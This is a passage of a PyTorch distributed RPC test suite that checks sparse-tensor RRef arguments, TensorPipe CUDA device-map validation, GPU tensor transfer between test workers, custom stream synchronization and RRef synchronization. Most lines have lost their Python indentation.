self._test_multi_remote_call(
my_function,
True,
kwargs_fn=RpcTest._multi_kwargs_fn
)
@dist_init
def test_py_rref_args_sparse(self):
self._py_rref_args(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 4
)
@dist_init
def test_py_rref_args_user_share_sparse(self):
self._py_rref_args_user_share(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 6
)
@dist_init
def test_py_rpc_rref_args_sparse(self):
self._py_rpc_rref_args(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 6
)
@dist_init
def test_nested_remote_sparse(self):
self._nested_remote(
nested_remote_sparse,
build_sparse_tensor() + build_sparse_tensor()
)
@dist_init
def test_nested_rref_sparse(self):
self._nested_rref(
nested_rref_sparse,
build_sparse_tensor() * 2,
build_sparse_tensor() * 2
)
@dist_init
def test_nested_rref_stress_sparse(self):
self._nested_rref_stress(
nested_rref_sparse,
build_sparse_tensor() * 2,
build_sparse_tensor() * 2
)
@dist_init
def test_my_parameter_server_sparse(self):
# True selects the sparse-tensor code path in the shared helper.
self._my_parameter_server(True)
class TensorPipeAgentCudaRpcTest(RpcAgentTestFixture, RpcTestCommon):
# CUDA-specific TensorPipe tests: device-map validation, GPU tensor
# transport, custom-stream synchronization, and RRef synchronization.
def _test_device_maps(self, options, errMsg):
# init_rpc with invalid device-map options must raise ValueError
# matching errMsg, and must leave no RPC agent set.
with self.assertRaisesRegex(ValueError, errMsg):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
self.assertFalse(rpc.api._is_current_rpc_agent_set())
@skip_if_lt_x_gpu(2)
def test_device_maps_wrong_worker_name(self):
# Device map keyed on a worker name that does not exist.
options = self.rpc_backend_options
options.set_device_map("none_exist", {0: 1})
self._test_device_maps(
options,
errMsg="Node worker0 has invalid target node names in its device maps"
)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_local_device(self):
# Source device index one past the last local GPU.
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {torch.cuda.device_count(): 0})
self._test_device_maps(
options,
errMsg="Node worker0 has source devices with invalid indices in its device map for worker1"
)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_remote_device(self):
# Target device index one past the last remote GPU.
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: torch.cuda.device_count()})
self._test_device_maps(
options,
errMsg="Node worker0 has target devices with invalid indices in its device map for worker1"
)
@skip_if_lt_x_gpu(2)
def test_device_maps_many_to_one(self):
# Two source devices mapped onto the same target device.
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
options.set_device_map(dst, {0: 0})
self._test_device_maps(
options,
errMsg="Node worker0 has duplicated target devices in its device map for worker1"
)
@skip_if_lt_x_gpu(2)
def test_device_maps_one_to_many(self):
# A source device mapped to two targets is rejected at set time.
if self.rank == 0:
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1})
with self.assertRaisesRegex(
ValueError, "`set_device_map` only supports 1-to-1 mapping"
):
options.set_device_map(dst, {0: 0})
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_min_device(self):
# Negative device indices are rejected on either side of the map.
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {-1: 0})
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {0: -1})
@staticmethod
def _gpu_add(x, y):
    """Add two tensors that must both reside on cuda:1; return the sum on cuda:0.

    Raises ValueError if either input is not on cuda:1.
    """
    # Guard clause instead of if/else: reject inputs on the wrong device.
    on_gpu_one = x.is_cuda and x.device.index == 1 and y.is_cuda and y.device.index == 1
    if not on_gpu_one:
        raise ValueError("Wrong device affinity")
    return (x + y).to(0)
@skip_if_lt_x_gpu(2)
def test_device_maps_gpu(self):
# With the cross map {0: 1, 1: 0}, args sent from local GPU 0 land on
# remote GPU 1 (checked by _gpu_add) and the result returns on GPU 1.
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1, 1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add,
args=(torch.zeros(2).to(0), torch.ones(2).to(0))
)
self.assertEqual(ret.device, torch.device(1))
self.assertEqual(ret, (torch.zeros(2) + torch.ones(2)).to(1))
rpc.shutdown()
@staticmethod
def _gpu_add_given_devices(x, y, x_to, y_to, z_to):
    """Verify x and y arrived on devices x_to and y_to, then return x + y on z_to.

    A device is identified as the string "cpu" or a CUDA device index.
    Raises ValueError if either input is on an unexpected device.
    """
    x_loc = "cpu" if x.device.type == "cpu" else x.device.index
    y_loc = "cpu" if y.device.type == "cpu" else y.device.index
    # Guard clause: fail fast on wrong placement, then compute on z_to.
    if x_loc != x_to or y_loc != y_to:
        raise ValueError("Wrong device affinity")
    return x.to(z_to) + y.to(z_to)
def _test_device_maps_gpu(self, x_from, y_from, z_to, device_map, dst=None, fn=None):
# Generic driver: send x/y from the given local devices through
# device_map, have fn verify placement remotely and add on z_to, then
# check the result comes back on the reverse-mapped local device.
fn = TensorPipeAgentCudaRpcTest._gpu_add_given_devices if fn is None else fn
x_to = device_map[x_from]
y_to = device_map[y_from]
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size) if dst is None else dst
options.set_device_map(dst, device_map)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(x_from)
y = torch.ones(2).to(y_from)
ret = rpc.rpc_sync(dst, fn, args=(x, y, x_to, y_to, z_to))
# Responses are mapped back through the inverse of device_map.
reverse_device_map = {device_map[k] : k for k in device_map}
z_from = reverse_device_map[z_to]
ret_device = "cpu" if ret.device.type == "cpu" else ret.device.index
self.assertEqual(ret_device, z_from)
self.assertEqual(ret, torch.ones(2).to(z_from))
rpc.shutdown()
# The following wrappers enumerate cpu/gpu source, target, and return-device
# combinations for _test_device_maps_gpu; the *_self variants loop back to
# this worker itself (dst=worker_name(self.rank)).
def test_device_map_cpu(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to="cpu",
device_map={"cpu" : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(1)
def test_device_map_cpu_to_gpu_default(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to=0,
device_map={"cpu" : 0},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_cpu_to_gpu_non_default(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to=1,
device_map={"cpu" : 1},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(1)
def test_device_map_gpu_to_cpu_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to="cpu",
device_map={0 : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_to_cpu_non_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to="cpu",
device_map={1 : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to=0,
device_map={0 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_non_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to=1,
device_map={1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_default_to_non_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to=1,
device_map={0 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_non_default_to_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to=0,
device_map={1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_1(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_2(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_3(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_4(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_5(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_6(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_7(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_8(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_1(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_2(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_3(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_4(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_5(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_6(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_7(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_8(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@staticmethod
def _gpu_add_multi_gpu(x, y):
# Remote body: expects x on cuda:1 and y on cuda:0 (i.e. after the
# {0: 1}/{1: 0} cross map); returns one result per GPU.
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 0]):
return x.to(0) + y, x - y.to(1)
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_multi_gpu(self, dst):
# Two single-entry set_device_map calls accumulate into one map.
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(1)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
args=(x, y)
)
# Results come back through the reverse map: remote 0 -> local 1, etc.
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_multi_gpu(dst)
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu_self(self):
# Same check, but sending to this worker itself.
dst = worker_name(self.rank)
self._test_device_maps_multi_gpu(dst)
@staticmethod
def _gpu_add_return_to_gpu(x, y):
# Remote body: expects CPU inputs and spreads four results over GPUs 0-3.
if x.device.type == 'cpu' and y.device.type == 'cpu':
return (x + y).to(0), (x - y).to(1), (x * y).to(2), (x / y).to(3)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_in_options(self):
# device_maps can be supplied via the TensorPipeRpcBackendOptions
# constructor instead of set_device_map.
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc.TensorPipeRpcBackendOptions(
init_method=options.init_method,
num_worker_threads=options.num_worker_threads,
device_maps={dst: {0: 1, 1: 0}}
)
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
args=(torch.zeros(2).to(0), torch.ones(2).to(1))
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
def _test_device_maps_return_to_gpu(self, dst):
# Rotating map {0:1, 1:2, 2:3, 3:0}; CPU args go out, four GPU results
# come back shifted by the reverse map.
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 2})
options.set_device_map(dst, {2: 3})
options.set_device_map(dst, {3: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_return_to_gpu,
args=(torch.zeros(2), torch.ones(2))
)
for i in range(len(rets)):
self.assertEqual(rets[i].device, torch.device((3 + i) % 4))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(3))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
self.assertEqual(rets[2], (torch.zeros(2) * torch.ones(2)).to(1))
self.assertEqual(rets[3], (torch.zeros(2) / torch.ones(2)).to(2))
rpc.shutdown()
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_return_to_gpu(dst)
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu_self(self):
# Same check, but sending to this worker itself.
dst = worker_name(self.rank)
self._test_device_maps_return_to_gpu(dst)
@staticmethod
def _add_to_gpu(x, y):
    """Return the sum of x and y moved onto GPU 0."""
    total = x + y
    return total.to(0)
def _test_device_maps_missing_config(self, mode):
# Sending a CUDA tensor with no device map configured must fail with a
# clear error, and the agent must stay usable for CPU RPCs afterwards.
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = (
"TensorPipe RPC backend only supports CPU tensors by default.*"
"`set_device_map` on `TensorPipeRpcBackendOptions`"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(dst, torch.add, args=(torch.zeros(2).to(0), 1))
elif mode == RPCExecMode.REMOTE:
rpc.remote(dst, torch.add, args=(torch.zeros(2).to(0), 1)).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
def _test_device_maps_missing_config_response(self, mode):
# Same as above, but the *response* tensor is on GPU while no response
# device mapping exists.
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = "Response device mapping is not available"
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
elif mode == RPCExecMode.REMOTE:
rpc.remote(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config(self):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
def test_device_maps_missing_config_not_timeout(self):
# The missing-config error must be raised promptly, not after the full
# RPC timeout elapses.
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options
)
timeout = rpc.get_rpc_timeout()
tik = time.time()
self._test_device_maps_missing_config(RPCExecMode.SYNC)
rpc.shutdown()
tok = time.time()
self.assertTrue(tok - tik < timeout)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_loop(self):
# Repeat beyond the thread-pool size to check no worker thread leaks.
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote(self):
self._test_device_maps_missing_config(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(2)
def test_device_maps_remote(self):
# rpc.remote + to_here with a {1: 0} map: result created on remote GPU 0
# arrives on local GPU 1.
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
self.assertEqual(rref.to_here().device.index, 1)
self.assertEqual(rref.to_here(), torch.ones(2).to(1))
rpc.shutdown()
@staticmethod
def _slow_add_on_user_stream(x, y):
# Compute x + y on a user-created stream after an artificial delay, and
# hand the result back to the caller's current stream. The explicit
# wait_stream/record_stream calls are the synchronization under test.
s0 = torch.cuda.current_stream(x.device)
s1 = torch.cuda.Stream(device=x.device)
# s1 must not start before work already queued on s0 completes.
s1.wait_stream(s0)
x.record_stream(s1)
y.record_stream(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
z = x + y
# Make s0 wait for the add, and keep z alive for use on s0.
s0.wait_stream(s1)
z.record_stream(s0)
return z
def _test_custom_stream(self, fn, device_map):
# Shared driver: init RPC with the given device map, run fn(dst), shut down.
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, device_map)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
fn(dst)
rpc.shutdown()
def _test_stream_sync(self, dst):
# One synchronous call through the slow user-stream adder.
x = torch.ones(2, 2).to(0)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, x)
)
self.assertEqual(ret, 2 * x)
@skip_if_lt_x_gpu(2)
def test_custom_stream(self):
self._test_custom_stream(self._test_stream_sync, {"cuda:0": "cuda:1"})
def _test_stream_multi_async(self, dst):
# Many overlapping async calls; each must still return the right value.
futs = []
for i in range(20):
x = torch.ones(2, 2).to(0) * i
futs.append(
rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, x)
)
)
for i in range(20):
self.assertEqual(futs[i].wait(), 2 * torch.ones(2, 2).to(0) * i)
@skip_if_lt_x_gpu(2)
def test_custom_stream_multi(self):
self._test_custom_stream(
self._test_stream_multi_async,
{"cuda:0": "cuda:1"}
)
@staticmethod
def _nested_slow_add_on_user_stream(dst, x, y, z):
# Remote body that itself issues a nested RPC before the final add.
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, y)
)
return TensorPipeAgentCudaRpcTest._slow_add_on_user_stream(ret, z)
def _test_stream_nested_sync(self, dst):
x = torch.ones(2, 2).to(0)
y = torch.ones(2, 2).to(0) * 2
z = torch.ones(2, 2).to(0) * 3
nested_dst = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
args=(nested_dst, x, y, z)
)
self.assertEqual(ret, 6 * x)
@skip_if_lt_x_gpu(2)
def test_custom_stream_nested(self):
self._test_custom_stream(
self._test_stream_nested_sync,
{"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
)
def _test_stream_nested_multi_async(self, dst):
# Rank 0 fans out several nested async calls with distinct payloads.
if self.rank == 0:
futs = []
n = 5
xs, ys, zs = [], [], []
for i in range(n):
x = torch.ones(2, 2).to(0) * (i - 1)
y = torch.ones(2, 2).to(0) * i
z = torch.ones(2, 2).to(0) * (i + 1)
xs.append(x)
ys.append(y)
zs.append(z)
nested_dst = worker_name((self.rank + 2) % self.world_size)
futs.append(
rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
args=(nested_dst, x, y, z)
)
)
for i in range(n):
self.assertEqual(futs[i].wait(), xs[i] + ys[i] + zs[i])
@skip_if_lt_x_gpu(2)
def test_custom_stream_nested_multi(self):
self._test_custom_stream(
self._test_stream_nested_multi_async,
{"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
)
@staticmethod
def _gpu_add_wrong_gpus(x, y):
# Deliberately mixes a CPU tensor with a CUDA tensor to trigger the
# cross-device error on the remote side.
if x.is_cuda and y.is_cuda:
return x.cpu() + y.cuda()
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(1)
def test_device_mismatch(self):
# The remote cross-device add must surface torch's device-mismatch
# RuntimeError to the caller.
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(0)
with self.assertRaisesRegex(
RuntimeError,
"Expected all tensors to be on the same device, but found at least two devices"
):
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_wrong_gpus,
args=(x, y)
)
rpc.shutdown()
def _test_rref_synchronization(self, local_device, remote_device):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {local_device : remote_device})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 1:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN of MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
x = torch.randn(200, 1, 28, 28).to(local_device)
actual = rref.remote().forward(x).to_here()
expected = rref.rpc_sync().forward(x)
self.assertEqual(actual, expected)
rpc.shutdown()
# Wrappers covering every local/remote device pairing for two GPUs.
@skip_if_lt_x_gpu(1)
def test_rref_to_here_synchronization1(self):
self._test_rref_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization2(self):
self._test_rref_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization3(self):
self._test_rref_synchronization("cuda:1", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization4(self):
self._test_rref_synchronization("cuda:0", "cuda:1")
def _test_rref_as_arg_synchronization(
self,
local_device,
remote_device,
devicesOptions=None
):
# Same synchronization check as _test_rref_synchronization, but the
# input is passed as an RRef, so a reverse device map from the input
# source is also required.
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {local_device: remote_device})
input_src = worker_name((self.rank - 1 + self.world_size) % self.world_size)
options.set_device_map(input_src, {remote_device: local_device})
if devicesOptions is not None:
options.set_devices(devicesOptions[self.rank])
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 1:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN of MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
rref_x = RRef(torch.randn(200, 1, 28, 28).to(local_device))
actual = rref.remote().forward(rref_x, True).to_here()
expected = rref.rpc_sync().forward(rref_x, True)
self.assertEqual(actual, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_as_arg_synchronization1(self):
self._test_rref_as_arg_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization2(self):
self._test_rref_as_arg_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization3(self):
self._test_rref_as_arg_synchronization("cuda:1", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization4(self):
self._test_rref_as_arg_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(1)
def test_rref_as_arg_synchronization5(self):
self._test_rref_as_arg_synchronization(
"cuda:0",
"cuda:0",
[["cuda:0"] for _ in range(4)],  # devicesOptions
)
@staticmethod
def _rref_relay(rref):
return rref.to_here()
    def _test_rref_forward_synchronization(self, local_device, remote_device):
        """Check RRef forward-output CUDA stream sync across a relay worker.

        worker0 drives the test, worker1 hosts the model, worker2 relays the
        forward output RRef back through ``_rref_relay``; results from the
        relayed path must match a direct ``rpc_sync().forward`` call.
        """
        options = self.rpc_backend_options
        input_src = worker_name(0)
        model_dst = worker_name(1)
        out_relay = worker_name(2)
        if self.rank == 0:
            # for 1) model construction 2) forward execution
            options.set_device_map(model_dst, {local_device: remote_device})
            # Forward output will be first copied to the relay node before
            # returning to the worker. This is intentional, to test RRef
            # forward CUDA stream synchronizations.
            options.set_device_map(out_relay, {local_device: local_device})
        elif self.rank == 1:
            # worker1 hosts the model and runs forward. The forward function
            # calls RRef.to_here(), hence needs to configure the device map
            options.set_device_map(input_src, {remote_device: local_device})
        elif self.rank == 2:
            # worker2 will get the out RRef and call to_here() and hence, needs
            # to configure device map.
            options.set_device_map(model_dst, {local_device: remote_device})
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=options,
        )
        if self.rank == 0:
            # This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
            # If to_here() is properly synchronized with forward(x) the results must be identical
            # This test needs multiple iterations and significant batch size to simulate real
            # training of a CNN of MNIST-like data.
            # see https://github.com/pytorch/pytorch/issues/54771
            rref = rpc.remote(model_dst, MyConvNetForMNIST, args=(remote_device,))
            for _ in range(10):
                rref_input = RRef(torch.randn(200, 1, 28, 28).to(local_device))
                rref_out = rref.remote().forward(rref_input, True)
                out = rpc.remote(
                    out_relay,
                    TensorPipeAgentCudaRpcTest._rref_relay,
                    args=(rref_out,)
                ).to_here()
                expected = rref.rpc_sync().forward(rref_input, True)
                self.assertEqual(out, expected)
        rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_forward_synchronization1(self):
self._test_rref_forward_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization2(self):
